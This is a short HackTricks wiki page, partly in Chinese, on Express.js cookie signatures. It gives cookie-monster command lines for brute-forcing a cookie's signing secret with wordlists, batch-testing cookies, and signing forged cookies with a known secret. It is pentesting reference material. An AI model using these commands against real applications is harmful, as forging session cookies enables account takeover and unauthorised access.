mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 22:20:43 +00:00
853 B
853 B
NodeJS Express
Cookie Signature
The tool https://github.com/DigitalInterruption/cookie-monster 是一个用于自动化测试和重新签名 Express.js cookie secrets 的实用工具。
具有特定名称的单个 cookie
cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session
自定义字典
cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst
使用批处理模式测试多个Cookie
cookie-monster -b -f cookies.json
使用自定义字典批量测试多个cookie
cookie-monster -b -f cookies.json -w custom.lst
编码并签署一个新的cookie
如果你知道密钥,你可以签署这个cookie。
cookie-monster -e -f new_cookie.json -k secret